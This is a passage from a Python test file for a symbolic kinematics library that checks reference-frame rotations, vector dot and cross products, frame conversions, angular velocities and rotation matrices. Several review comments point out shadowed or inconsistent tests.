q1, q2, q3, q4, q5, q6 = q
q1p, q2p, q3p, q4p, q5p, q6p = qd
A = N.rotate('A', 3, q1)
B = A.rotate('B', 1, q2)
C = B.rotate('C', 2, q3)
# The zero vector, used as the expected value of vanishing cross products.
zero = Vector({})
def test_Mul_order():
    """Products of UnitVectors must preserve (non-commutative) factor order."""
    e1 = UnitVector(A, 1)
    e2 = UnitVector(A, 2)
    e3 = UnitVector(A, 3)
    assert e1*e2 == e1*e2
    assert e1*e2 != e2*e1
    assert e2*e1*e3 == e2*e1*e3
    assert e2*e1*e3 != e3*e2*e1
def test_UnitVector():
    """Smoke test: UnitVector construction must not raise.

    NOTE(review): no assertions — the locals are intentionally unused.
    """
    a1 = UnitVector(A, 1)
    a2 = UnitVector(A, 2)
    a3 = UnitVector(A, 3)
def test_dot_cross():
    """dot/cross on one frame's basis follow the orthonormal right-hand rules."""
    assert dot(A[1], A[1]) == 1
    assert dot(A[1], A[2]) == 0
    assert dot(A[1], A[3]) == 0
    assert dot(A[2], A[1]) == 0
    assert dot(A[2], A[2]) == 1
    assert dot(A[2], A[3]) == 0
    assert dot(A[3], A[1]) == 0
    assert dot(A[3], A[2]) == 0
    assert dot(A[3], A[3]) == 1
    assert cross(A[1], A[1]) == zero
    assert cross(A[1], A[2]) == A[3]
    assert cross(A[1], A[3]) == -A[2]
    assert cross(A[2], A[1]) == -A[3]
    assert cross(A[2], A[2]) == zero
    assert cross(A[2], A[3]) == A[1]
    assert cross(A[3], A[1]) == A[2]
    assert cross(A[3], A[2]) == -A[1]
    assert cross(A[3], A[3]) == zero
"""
def test_expressions():
A = ReferenceFrame('A')
x, y = symbols("x y")
e = x+x*A[1]+y+A[2]
assert e == x+x*A[1]+y+A[2]
assert e != x+x*A[1]+x+A[2]
"""
def test_ReferenceFrame():
    """Rotating a frame about each body axis records a transform to its parent."""
    A = ReferenceFrame('A')
    phi = Symbol("phi")
    for axis in (1, 2, 3):
        B = A.rotate("B", axis, phi)
        assert B.transforms[A] is not None
def test_cross_different_frames1():
    """cross() between N and A basis vectors, with results in the A frame."""
    assert cross(N[1], A[1]) == sin(q1)*A[3]
    assert cross(N[1], A[2]) == cos(q1)*A[3]
    assert cross(N[1], A[3]) == -sin(q1)*A[1]-cos(q1)*A[2]
    assert cross(N[2], A[1]) == -cos(q1)*A[3]
    assert cross(N[2], A[2]) == sin(q1)*A[3]
    assert cross(N[2], A[3]) == cos(q1)*A[1]-sin(q1)*A[2]
    assert cross(N[3], A[1]) == A[2]
    assert cross(N[3], A[2]) == -A[1]
    assert cross(N[3], A[3]) == 0
def test_cross_method():
    """UnitVector.cross() across frames rotated about each of the three axes."""
    # Local frames deliberately shadow the module-level N/A/B/C fixtures:
    # here A, B, C are each direct children of N about axes 1, 2, 3.
    N = NewtonianReferenceFrame('N')
    q, qd = N.declare_coords('q', 3)
    q1, q2, q3 = q
    A = N.rotate('A', 1, q1)
    B = N.rotate('B', 2, q2)
    C = N.rotate('C', 3, q3)
    assert cross(N[1], N[1]) == Vector(0) == 0
    assert cross(N[1], N[2]) == N[3]
    assert N[1].cross(N[3]) == Vector({N[2]: -1})
    assert N[2].cross(N[1]) == Vector({N[3]: -1})
    assert N[2].cross(N[2]) == Vector(0)
    assert N[2].cross(N[3]) == N[1]
    assert N[3].cross(N[1]) == N[2]
    assert N[3].cross(N[2]) == Vector({N[1]: -1})
    assert N[3].cross(N[3]) == Vector(0)
    assert N[1].cross(A[1]) == Vector(0)
    assert N[1].cross(A[2]) == A[3]
    assert N[1].cross(A[3]) == Vector(-A[2])
    assert N[2].cross(A[1]) == Vector(-N[3])
    assert N[2].cross(A[2]) == Vector(sin(q1)*N[1])
    assert N[2].cross(A[3]) == Vector(cos(q1)*N[1])
    assert N[1].cross(B[1]) == Vector(sin(q2)*N[2])
    assert N[1].cross(B[2]) == N[3]
    assert N[1].cross(B[3]) == Vector(-cos(q2)*N[2])
def test_cross_different_frames2():
    """cross() distributes over vector sums and is antisymmetric."""
    assert cross(N[1], A[1]) == sin(q1)*A[3]
    assert cross(N[1], A[2]) == cos(q1)*A[3]
    assert cross(N[1], A[1] + A[2]) == sin(q1)*A[3] + cos(q1)*A[3]
    assert cross(A[1] + A[2], N[1]) == -sin(q1)*A[3] - cos(q1)*A[3]
def test_cross_different_frames3():
    """cross() between A and C unit vectors (two rotations apart) in both orders."""
    assert cross(A[1], C[1]) == sin(q3)*C[2]
    assert cross(A[1], C[2]) == -sin(q3)*C[1] + cos(q3)*C[3]
    assert cross(A[1], C[3]) == -cos(q3)*C[2]
    assert cross(C[1], A[1]) == -sin(q3)*C[2]
    assert cross(C[2], A[1]) == sin(q3)*C[1] - cos(q3)*C[3]
    assert cross(C[3], A[1]) == cos(q3)*C[2]
def test_express1():
    """express() rewrites A basis vectors in the C frame."""
    assert express(A[1], C) == cos(q3)*C[1] + sin(q3)*C[3]
    assert express(A[2], C) == sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] - \
        sin(q2)*cos(q3)*C[3]
    assert express(A[3], C) == -sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] + \
        cos(q2)*cos(q3)*C[3]
def test_express2():
    """UnitVector.express() for the A basis vectors in every frame of the chain."""
    assert A[1].express(N) == Vector(cos(q1)*N[1] + sin(q1)*N[2])
    assert A[2].express(N) == Vector(-sin(q1)*N[1] + cos(q1)*N[2])
    assert A[3].express(N) == N[3]
    assert A[1].express(A) == A[1]
    assert A[2].express(A) == A[2]
    assert A[3].express(A) == A[3]
    assert A[1].express(B) == B[1]
    assert A[2].express(B) == Vector(cos(q2)*B[2] - sin(q2)*B[3])
    assert A[3].express(B) == Vector(sin(q2)*B[2] + cos(q2)*B[3])
    assert A[1].express(C) == Vector(cos(q3)*C[1] + sin(q3)*C[3])
    assert A[2].express(C) == Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] - \
        sin(q2)*cos(q3)*C[3])
    assert A[3].express(C) == Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] + \
        cos(q2)*cos(q3)*C[3])
def test_express3():
    """express() for every (unit vector, frame) pair across N, A, B, C.

    Also checks the round trip: expressing an expanded Vector back in its
    original frame must collapse it to a single UnitVector again.
    """
    # Check to make sure UnitVectors get converted properly
    assert express(N[1], N) == N[1]
    assert express(N[2], N) == N[2]
    assert express(N[3], N) == N[3]
    assert express(N[1], A) == Vector(cos(q1)*A[1] - sin(q1)*A[2])
    assert express(N[2], A) == Vector(sin(q1)*A[1] + cos(q1)*A[2])
    assert express(N[3], A) == A[3]
    assert express(N[1], B) == Vector(cos(q1)*B[1] - sin(q1)*cos(q2)*B[2] + \
        sin(q1)*sin(q2)*B[3])
    assert express(N[2], B) == Vector(sin(q1)*B[1] + cos(q1)*cos(q2)*B[2] - \
        sin(q2)*cos(q1)*B[3])
    assert express(N[3], B) == Vector(sin(q2)*B[2] + cos(q2)*B[3])
    assert express(N[1], C) == Vector(
        (cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*C[1] -
        sin(q1)*cos(q2)*C[2] +
        (sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*C[3])
    assert express(N[2], C) == Vector(
        (sin(q1)*cos(q3) + sin(q2)*sin(q3)*cos(q1))*C[1] +
        cos(q1)*cos(q2)*C[2] +
        (sin(q1)*sin(q3) - sin(q2)*cos(q1)*cos(q3))*C[3])
    assert express(N[3], C) == Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
        cos(q2)*cos(q3)*C[3])
    assert express(A[1], N) == Vector(cos(q1)*N[1] + sin(q1)*N[2])
    assert express(A[2], N) == Vector(-sin(q1)*N[1] + cos(q1)*N[2])
    assert express(A[3], N) == N[3]
    assert express(A[1], A) == A[1]
    assert express(A[2], A) == A[2]
    assert express(A[3], A) == A[3]
    assert express(A[1], B) == B[1]
    assert express(A[2], B) == Vector(cos(q2)*B[2] - sin(q2)*B[3])
    assert express(A[3], B) == Vector(sin(q2)*B[2] + cos(q2)*B[3])
    assert express(A[1], C) == Vector(cos(q3)*C[1] + sin(q3)*C[3])
    assert express(A[2], C) == Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] -
        sin(q2)*cos(q3)*C[3])
    assert express(A[3], C) == Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
        cos(q2)*cos(q3)*C[3])
    assert express(B[1], N) == Vector(cos(q1)*N[1] + sin(q1)*N[2])
    assert express(B[2], N) == Vector(-sin(q1)*cos(q2)*N[1] +
        cos(q1)*cos(q2)*N[2] + sin(q2)*N[3])
    assert express(B[3], N) == Vector(sin(q1)*sin(q2)*N[1] -
        sin(q2)*cos(q1)*N[2] + cos(q2)*N[3])
    assert express(B[1], A) == A[1]
    assert express(B[2], A) == Vector(cos(q2)*A[2] + sin(q2)*A[3])
    assert express(B[3], A) == Vector(-sin(q2)*A[2] + cos(q2)*A[3])
    assert express(B[1], B) == B[1]
    assert express(B[2], B) == B[2]
    assert express(B[3], B) == B[3]
    assert express(B[1], C) == Vector(cos(q3)*C[1] + sin(q3)*C[3])
    assert express(B[2], C) == C[2]
    assert express(B[3], C) == Vector(-sin(q3)*C[1] + cos(q3)*C[3])
    assert express(C[1], N) == Vector(
        (cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*N[1] +
        (sin(q1)*cos(q3)+sin(q2)*sin(q3)*cos(q1))*N[2] -
        sin(q3)*cos(q2)*N[3])
    assert express(C[2], N) == Vector(
        -sin(q1)*cos(q2)*N[1] + cos(q1)*cos(q2)*N[2] + sin(q2)*N[3])
    assert express(C[3], N) == Vector(
        (sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*N[1] +
        (sin(q1)*sin(q3)-sin(q2)*cos(q1)*cos(q3))*N[2] +
        cos(q2)*cos(q3)*N[3])
    assert express(C[1], A) == Vector(cos(q3)*A[1] + sin(q2)*sin(q3)*A[2] -
        sin(q3)*cos(q2)*A[3])
    assert express(C[2], A) == Vector(cos(q2)*A[2] + sin(q2)*A[3])
    assert express(C[3], A) == Vector(sin(q3)*A[1] - sin(q2)*cos(q3)*A[2] +
        cos(q2)*cos(q3)*A[3])
    assert express(C[1], B) == Vector(cos(q3)*B[1] - sin(q3)*B[3])
    assert express(C[2], B) == B[2]
    assert express(C[3], B) == Vector(sin(q3)*B[1] + cos(q3)*B[3])
    assert express(C[1], C) == C[1]
    assert express(C[2], C) == C[2]
    assert express(C[3], C) == C[3] == Vector(C[3])
    # Check to make sure Vectors get converted back to UnitVectors
    assert N[1] == express(Vector(cos(q1)*A[1] - sin(q1)*A[2]), N)
    assert N[2] == express(Vector(sin(q1)*A[1] + cos(q1)*A[2]), N)
    assert N[1] == express(Vector(cos(q1)*B[1] - sin(q1)*cos(q2)*B[2] +
        sin(q1)*sin(q2)*B[3]), N)
    assert N[2] == express(Vector(sin(q1)*B[1] + cos(q1)*cos(q2)*B[2] -
        sin(q2)*cos(q1)*B[3]), N)
    assert N[3] == express(Vector(sin(q2)*B[2] + cos(q2)*B[3]), N)
    assert N[1] == express(Vector(
        (cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*C[1] -
        sin(q1)*cos(q2)*C[2] +
        (sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*C[3]), N)
    assert N[2] == express(Vector(
        (sin(q1)*cos(q3) + sin(q2)*sin(q3)*cos(q1))*C[1] +
        cos(q1)*cos(q2)*C[2] +
        (sin(q1)*sin(q3) - sin(q2)*cos(q1)*cos(q3))*C[3]), N)
    assert N[3] == express(Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
        cos(q2)*cos(q3)*C[3]), N)
    assert A[1] == express(Vector(cos(q1)*N[1] + sin(q1)*N[2]), A)
    assert A[2] == express(Vector(-sin(q1)*N[1] + cos(q1)*N[2]), A)
    assert A[2] == express(Vector(cos(q2)*B[2] - sin(q2)*B[3]), A)
    assert A[3] == express(Vector(sin(q2)*B[2] + cos(q2)*B[3]), A)
    assert A[1] == express(Vector(cos(q3)*C[1] + sin(q3)*C[3]), A)
    # Tripsimp messes up here too.
    #print express(Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] -
    #    sin(q2)*cos(q3)*C[3]), A)
    assert A[2] == express(Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] -
        sin(q2)*cos(q3)*C[3]), A)
    assert A[3] == express(Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
        cos(q2)*cos(q3)*C[3]), A)
    assert B[1] == express(Vector(cos(q1)*N[1] + sin(q1)*N[2]), B)
    assert B[2] == express(Vector(-sin(q1)*cos(q2)*N[1] +
        cos(q1)*cos(q2)*N[2] + sin(q2)*N[3]), B)
    assert B[3] == express(Vector(sin(q1)*sin(q2)*N[1] -
        sin(q2)*cos(q1)*N[2] + cos(q2)*N[3]), B)
    assert B[2] == express(Vector(cos(q2)*A[2] + sin(q2)*A[3]), B)
    assert B[3] == express(Vector(-sin(q2)*A[2] + cos(q2)*A[3]), B)
    assert B[1] == express(Vector(cos(q3)*C[1] + sin(q3)*C[3]), B)
    assert B[3] == express(Vector(-sin(q3)*C[1] + cos(q3)*C[3]), B)
    assert C[1] == express(Vector(
        (cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*N[1] +
        (sin(q1)*cos(q3)+sin(q2)*sin(q3)*cos(q1))*N[2] -
        sin(q3)*cos(q2)*N[3]), C)
    assert C[2] == express(Vector(
        -sin(q1)*cos(q2)*N[1] + cos(q1)*cos(q2)*N[2] + sin(q2)*N[3]), C)
    assert C[3] == express(Vector(
        (sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*N[1] +
        (sin(q1)*sin(q3)-sin(q2)*cos(q1)*cos(q3))*N[2] +
        cos(q2)*cos(q3)*N[3]), C)
    assert C[1] == express(Vector(cos(q3)*A[1] + sin(q2)*sin(q3)*A[2] -
        sin(q3)*cos(q2)*A[3]), C)
    assert C[2] == express(Vector(cos(q2)*A[2] + sin(q2)*A[3]), C)
    assert C[3] == express(Vector(sin(q3)*A[1] - sin(q2)*cos(q3)*A[2] +
        cos(q2)*cos(q3)*A[3]), C)
    assert C[1] == express(Vector(cos(q3)*B[1] - sin(q3)*B[3]), C)
    assert C[3] == express(Vector(sin(q3)*B[1] + cos(q3)*B[3]), C)
def test_ang_vel():
    """Relative angular velocity between every pair of frames in the chain.

    A2 is an extra frame rotated directly off N so that paths through the
    common ancestor N are exercised too.
    """
    A2 = N.rotate('A2', 2, q4)
    assert N.ang_vel(N) == Vector(0)
    assert N.ang_vel(A) == -q1p*N[3]
    assert N.ang_vel(B) == -q1p*A[3] - q2p*B[1]
    assert N.ang_vel(C) == -q1p*A[3] - q2p*B[1] - q3p*B[2]
    assert N.ang_vel(A2) == -q4p*N[2]
    assert A.ang_vel(N) == q1p*N[3]
    assert A.ang_vel(A) == Vector(0)
    assert A.ang_vel(B) == - q2p*B[1]
    assert A.ang_vel(C) == - q2p*B[1] - q3p*B[2]
    assert A.ang_vel(A2) == q1p*N[3] - q4p*N[2]
    assert B.ang_vel(N) == q1p*A[3] + q2p*A[1]
    assert B.ang_vel(A) == q2p*A[1]
    assert B.ang_vel(B) == Vector(0)
    assert B.ang_vel(C) == -q3p*B[2]
    assert B.ang_vel(A2) == q1p*A[3] + q2p*A[1] - q4p*N[2]
    assert C.ang_vel(N) == q1p*A[3] + q2p*A[1] + q3p*B[2]
    assert C.ang_vel(A) == q2p*A[1] + q3p*C[2]
    assert C.ang_vel(B) == q3p*B[2]
    assert C.ang_vel(C) == Vector(0)
    assert C.ang_vel(A2) == q1p*A[3] + q2p*A[1] + q3p*B[2] - q4p*N[2]
    assert A2.ang_vel(N) == q4p*A2[2]
    assert A2.ang_vel(A) == q4p*A2[2] - q1p*N[3]
    assert A2.ang_vel(B) == q4p*N[2] - q1p*A[3] - q2p*A[1]
    assert A2.ang_vel(C) == q4p*N[2] - q1p*A[3] - q2p*A[1] - q3p*B[2]
    assert A2.ang_vel(A2) == Vector(0)
def test_dt():
    """Frame-relative time derivatives (dt) of the N, A, B unit vectors."""
    assert dt(N[1], N) == Vector({})
    assert dt(N[2], N) == Vector({})
    assert dt(N[3], N) == Vector({})
    assert dt(N[1], A) == Vector(-q1p*N[2])
    assert dt(N[2], A) == Vector(q1p*N[1])
    assert dt(N[3], A) == Vector({})
    assert dt(N[1], B) == Vector(-q1p*N[2] + sin(q1)*q2p*N[3])
    assert dt(N[2], B) == Vector(q1p*N[1] - cos(q1)*q2p*N[3])
    assert dt(N[3], B) == Vector(q2p*A[2])
    assert express(dt(N[1], C), N) == Vector((-q1p -
        sin(q2)*q3p)*N[2] + (sin(q1)*q2p +
        cos(q1)*cos(q2)*q3p)*N[3])
    assert express(dt(N[2], C), N) == Vector((q1p +
        sin(q2)*q3p)*N[1] + (sin(q1)*cos(q2)*q3p -
        cos(q1)*q2p)*N[3])
    assert dt(N[3], C) == Vector(q2p*A[2] - cos(q2)*q3p*B[1])
    assert dt(A[1], N) == Vector(q1p*A[2]) == q1p*A[2]
    assert dt(A[2], N) == Vector(-q1p*A[1]) == -q1p*A[1]
    assert dt(A[3], N) == Vector({}) == 0
    assert dt(A[1], A) == Vector({}) == 0
    assert dt(A[2], A) == Vector({}) == 0
    assert dt(A[3], A) == Vector({}) == 0
    assert dt(A[1], B) == Vector({}) == 0
    assert dt(A[2], B) == Vector(-q2p*A[3]) == -q2p*A[3]
    assert dt(A[3], B) == Vector(q2p*A[2]) == q2p*A[2]
    assert dt(A[1], C) == Vector(q3p*B[3]) == q3p*B[3]
    assert dt(A[2], C) == Vector(sin(q2)*q3p*A[1] - q2p*A[3]) ==\
        sin(q2)*q3p*A[1] - q2p*A[3]
    assert dt(A[3], C) == Vector(-cos(q2)*q3p*A[1] + q2p*A[2]) \
        == -cos(q2)*q3p*A[1] + q2p*A[2]
    assert dt(B[1], N) == Vector(cos(q2)*q1p*B[2] -
        sin(q2)*q1p*B[3]) == cos(q2)*q1p*B[2] - \
        sin(q2)*q1p*B[3]
    assert dt(B[2], N) == Vector(-cos(q2)*q1p*B[1] + q2p*B[3]) \
        == -cos(q2)*q1p*B[1] + q2p*B[3]
    assert dt(B[3], N) == Vector(sin(q2)*q1p*B[1] - q2p*B[2]) ==\
        sin(q2)*q1p*B[1] - q2p*B[2]
    assert dt(B[1], A) == Vector({}) == 0
    assert dt(B[2], A) == Vector(q2p*B[3]) == q2p*B[3]
    assert dt(B[3], A) == Vector(-q2p*B[2]) == -q2p*B[2]
def test_get_frames_list1():
    """Frame-path lookups on the module-level N-A-B-C chain.

    NOTE(review): this definition is shadowed by a second
    ``test_get_frames_list1`` further down, so it never runs under pytest.
    Its last two expectations ([B, A, C] and [C, A, B]) also look
    inconsistent with the module topology, where C is a direct child of B —
    confirm before reviving it under a unique name.
    """
    assert B.get_frames_list(A) == [B, A]
    assert A.get_frames_list(B) == [A, B]
    assert A.get_frames_list(C) == [A, B, C]
    # Duplicate of the previous assertion.
    assert A.get_frames_list(C) == [A, B, C]
    assert C.get_frames_list(A) == [C, B, A]
    assert B.get_frames_list(C) == [B, A, C]
    assert C.get_frames_list(B) == [C, A, B]
def test_get_frames_list1():
    """Exhaustive shortest-path lookups over a branched rotation tree.

    Builds a local tree N -> {A, I}, A -> {B, D}, B -> C, D -> E,
    E -> {F, G}, G -> H and checks get_frames_list for every ordered pair.
    NOTE(review): this redefines the earlier test of the same name, which
    therefore never runs.
    """
    q1, q2, q3 = symbols('q1 q2 q3')
    N = ReferenceFrame('N')
    A = N.rotate('A', 3, q1)
    B = A.rotate('B', 1, q2)
    C = B.rotate('C', 2, q3)
    D = A.rotate('D', 2, q3)
    E = D.rotate('E', 2, q3)
    F = E.rotate('F', 2, q3)
    G = E.rotate('G', 3, q1)
    H = G.rotate('H', 2, q3)
    I = N.rotate('I', 2, q2)
    assert N.get_frames_list(N) == [N]
    assert N.get_frames_list(A) == [N, A]
    assert N.get_frames_list(B) == [N, A, B]
    assert N.get_frames_list(C) == [N, A, B, C]
    assert N.get_frames_list(D) == [N, A, D]
    assert N.get_frames_list(E) == [N, A, D, E]
    assert N.get_frames_list(F) == [N, A, D, E, F]
    assert N.get_frames_list(G) == [N, A, D, E, G]
    assert N.get_frames_list(H) == [N, A, D, E, G, H]
    assert N.get_frames_list(I) == [N, I]
    assert A.get_frames_list(N) == [A, N]
    assert A.get_frames_list(A) == [A]
    assert A.get_frames_list(B) == [A, B]
    assert A.get_frames_list(C) == [A, B, C]
    assert A.get_frames_list(D) == [A, D]
    assert A.get_frames_list(E) == [A, D, E]
    assert A.get_frames_list(F) == [A, D, E, F]
    assert A.get_frames_list(G) == [A, D, E, G]
    assert A.get_frames_list(H) == [A, D, E, G, H]
    assert A.get_frames_list(I) == [A, N, I]
    assert B.get_frames_list(N) == [B, A, N]
    assert B.get_frames_list(A) == [B, A]
    assert B.get_frames_list(B) == [B]
    assert B.get_frames_list(C) == [B, C]
    assert B.get_frames_list(D) == [B, A, D]
    assert B.get_frames_list(E) == [B, A, D, E]
    assert B.get_frames_list(F) == [B, A, D, E, F]
    assert B.get_frames_list(G) == [B, A, D, E, G]
    assert B.get_frames_list(H) == [B, A, D, E, G, H]
    assert B.get_frames_list(I) == [B, A, N, I]
    assert C.get_frames_list(N) == [C, B, A, N]
    assert C.get_frames_list(A) == [C, B, A]
    assert C.get_frames_list(B) == [C, B]
    assert C.get_frames_list(C) == [C]
    assert C.get_frames_list(D) == [C, B, A, D]
    assert C.get_frames_list(E) == [C, B, A, D, E]
    assert C.get_frames_list(F) == [C, B, A, D, E, F]
    assert C.get_frames_list(G) == [C, B, A, D, E, G]
    assert C.get_frames_list(H) == [C, B, A, D, E, G, H]
    assert C.get_frames_list(I) == [C, B, A, N, I]
    assert D.get_frames_list(N) == [D, A, N]
    assert D.get_frames_list(A) == [D, A]
    assert D.get_frames_list(B) == [D, A, B]
    assert D.get_frames_list(C) == [D, A, B, C]
    assert D.get_frames_list(D) == [D]
    assert D.get_frames_list(E) == [D, E]
    assert D.get_frames_list(F) == [D, E, F]
    assert D.get_frames_list(G) == [D, E, G]
    assert D.get_frames_list(H) == [D, E, G, H]
    assert D.get_frames_list(I) == [D, A, N, I]
    assert E.get_frames_list(N) == [E, D, A, N]
    assert E.get_frames_list(A) == [E, D, A]
    assert E.get_frames_list(B) == [E, D, A, B]
    assert E.get_frames_list(C) == [E, D, A, B, C]
    assert E.get_frames_list(D) == [E, D]
    assert E.get_frames_list(E) == [E]
    assert E.get_frames_list(F) == [E, F]
    assert E.get_frames_list(G) == [E, G]
    assert E.get_frames_list(H) == [E, G, H]
    assert E.get_frames_list(I) == [E, D, A, N, I]
    assert F.get_frames_list(N) == [F, E, D, A, N]
    assert F.get_frames_list(A) == [F, E, D, A]
    assert F.get_frames_list(B) == [F, E, D, A, B]
    assert F.get_frames_list(C) == [F, E, D, A, B, C]
    assert F.get_frames_list(D) == [F, E, D]
    assert F.get_frames_list(E) == [F, E]
    assert F.get_frames_list(F) == [F]
    assert F.get_frames_list(G) == [F, E, G]
    assert F.get_frames_list(H) == [F, E, G, H]
    assert F.get_frames_list(I) == [F, E, D, A, N, I]
    assert G.get_frames_list(N) == [G, E, D, A, N]
    assert G.get_frames_list(A) == [G, E, D, A]
    assert G.get_frames_list(B) == [G, E, D, A, B]
    assert G.get_frames_list(C) == [G, E, D, A, B, C]
    assert G.get_frames_list(D) == [G, E, D]
    assert G.get_frames_list(E) == [G, E]
    assert G.get_frames_list(F) == [G, E, F]
    assert G.get_frames_list(G) == [G]
    assert G.get_frames_list(H) == [G, H]
    assert G.get_frames_list(I) == [G, E, D, A, N, I]
    assert H.get_frames_list(N) == [H, G, E, D, A, N]
    assert H.get_frames_list(A) == [H, G, E, D, A]
    assert H.get_frames_list(B) == [H, G, E, D, A, B]
    assert H.get_frames_list(C) == [H, G, E, D, A, B, C]
    assert H.get_frames_list(D) == [H, G, E, D]
    assert H.get_frames_list(E) == [H, G, E]
    assert H.get_frames_list(F) == [H, G, E, F]
    assert H.get_frames_list(G) == [H, G]
    assert H.get_frames_list(H) == [H]
    assert H.get_frames_list(I) == [H, G, E, D, A, N, I]
    assert I.get_frames_list(N) == [I, N]
    assert I.get_frames_list(A) == [I, N, A]
    assert I.get_frames_list(B) == [I, N, A, B]
    assert I.get_frames_list(C) == [I, N, A, B, C]
    assert I.get_frames_list(D) == [I, N, A, D]
    assert I.get_frames_list(E) == [I, N, A, D, E]
    assert I.get_frames_list(F) == [I, N, A, D, E, F]
    assert I.get_frames_list(G) == [I, N, A, D, E, G]
    assert I.get_frames_list(H) == [I, N, A, D, E, G, H]
    assert I.get_frames_list(I) == [I]
def test_get_frames_list4():
    """Paths between existing frames after grafting an extra D-E-F branch.

    D, E, F are not asserted on directly; presumably they exist only to
    extend the frame graph and show the N/B/C paths are unaffected — confirm.
    """
    D = A.rotate('D', 1, q4)
    E = D.rotate('E', 3, q5)
    F = E.rotate('F', 2, q6)
    assert B.get_frames_list(N) == [B, A, N]
    assert N.get_frames_list(B) == [N, A, B]
    assert C.get_frames_list(N) == [C, B, A, N]
    assert N.get_frames_list(C) == [N, A, B, C]
def test_get_rot_matrices1():
    """Rotation-matrix chains between A, B, C for simple axis rotations."""
    # Hand-written direction cosine matrices for B<->A (axis 1, angle q2)
    # and B<->C (axis 2, angle q3).
    B_A = Matrix([
        [1, 0, 0],
        [0, cos(q2), sin(q2)],
        [0, -sin(q2), cos(q2)]
        ])
    A_B = Matrix([
        [1, 0, 0],
        [0, cos(q2), -sin(q2)],
        [0, sin(q2), cos(q2)]
        ])
    B_C = Matrix([
        [cos(q3), 0, sin(q3)],
        [0, 1, 0],
        [-sin(q3), 0, cos(q3)]
        ])
    C_B = Matrix([
        [cos(q3), 0, -sin(q3)],
        [0, 1, 0],
        [sin(q3), 0, cos(q3)]
        ])
    assert B.get_rot_matrices(B) == [eye(3)]
    assert B.get_rot_matrices(A) == [A_B]
    assert A.get_rot_matrices(B) == [B_A]
    assert A.get_rot_matrices(C) == [C_B, B_A]
    assert C.get_rot_matrices(A) == [A_B, B_C]
def test_get_rot_matrices2():
    """Rotation-matrix chains across a longer path C-B-A-D-E-F."""
    D = A.rotate('D', 2, q4)
    E = D.rotate('E', 1, q5)
    F = E.rotate('F', 3, q6)
    # Each X_Y matrix is the direction cosine matrix between adjacent
    # frames; the reverse direction is simply the transpose.
    A_B = Matrix([
        [1, 0, 0],
        [0, cos(q2), -sin(q2)],
        [0, sin(q2), cos(q2)],
        ])
    B_A = A_B.T
    B_C = Matrix([
        [cos(q3), 0, sin(q3)],
        [0, 1, 0],
        [-sin(q3), 0, cos(q3)],
        ])
    C_B = B_C.T
    A_D = Matrix([
        [cos(q4), 0, sin(q4)],
        [0, 1, 0],
        [-sin(q4), 0, cos(q4)],
        ])
    D_A = A_D.T
    D_E = Matrix([
        [1, 0, 0],
        [0, cos(q5), -sin(q5)],
        [0, sin(q5), cos(q5)],
        ])
    E_D = D_E.T
    E_F = Matrix([
        [cos(q6), -sin(q6), 0],
        [sin(q6), cos(q6), 0],
        [0, 0, 1],
        ])
    F_E = E_F.T
    assert C.get_rot_matrices(F) == [F_E, E_D, D_A, A_B, B_C]
    assert F.get_rot_matrices(C) == [C_B, B_A, A_D, D_E, E_F]
def test_cross2():
    """cross() results are frame-independent and antisymmetric."""
    for i in range(1, 4):
        for j in range(1, 4):
            lhs = cross(N[i], A[j])
            rhs = express(cross(N[i], A[j]), A)
            assert lhs == rhs
    for i in (1, 2, 3):
        for j in (1, 2, 3):
            lhs = cross(N[i], B[j])
            rhs = express(cross(B[j], N[i]), N)
            assert lhs == -rhs
def test_dot2():
    """dot() is symmetric for every unit-vector pairing of N with A and B."""
    for frame in (A, B):
        for i in range(1, 4):
            for j in range(1, 4):
                assert dot(N[i], frame[j]) == dot(frame[j], N[i])
def test_Vector_class():
    """Vector construction, parse_terms, equality, and the .dict attribute."""
    t = symbols('t')
    u1 = Function('u1')(t)
    v1 = Vector(0)
    v2 = Vector(q1*u1*A[1] + q2*t*sin(t)*A[2])
    v3 = Vector({B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)})
    # Basic functionality tests
    assert v1.parse_terms(A[1]) == {A[1]: 1}
    assert v1.parse_terms(0) == {}
    assert v1.parse_terms(S(0)) == {}
    assert v1.parse_terms(q1*sin(t)*A[1] + A[2]*cos(q2)*u1) == {A[1]: \
        q1*sin(t), A[2]: cos(q2)*u1}
    test = sin(q1)*sin(q1)*q2*A[3] + q1*A[2] + S(0) + cos(q3)*A[2]
    assert v1.parse_terms(test) == {A[3]: sin(q1)*sin(q1)*q2, \
        A[2]:cos(q3) + q1}
    # Equality tests
    v4 = v2 + v3
    assert v4 == v2 + v3
    v3 = Vector({B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)})
    v5 = Vector({B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)})
    assert v3 == v5
    # Another way to generate the same vector
    v5 = Vector(q1*sin(q2)*B[1] + t*u1*q1*sin(q2)*B[2])
    assert v3 == v5
    assert v5.dict == {B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)}
def test_mag():
    """Vector.mag returns the Euclidean norm of the coefficients."""
    A = ReferenceFrame('A')
    v1 = Vector(A[1])
    v2 = Vector(A[1] + A[2])
    v3 = Vector(A[1] + A[2] + A[3])
    v4 = -A[1]
    assert v1.mag == 1
    assert v2.mag == 2**Rational(1,2)
    assert v3.mag == 3**Rational(1,2)
    # Magnitude ignores sign.
    assert v4.mag == 1
def test_rotate_Euler_Space():
    """Body- and space-fixed Euler rotation matrices and angular velocities.

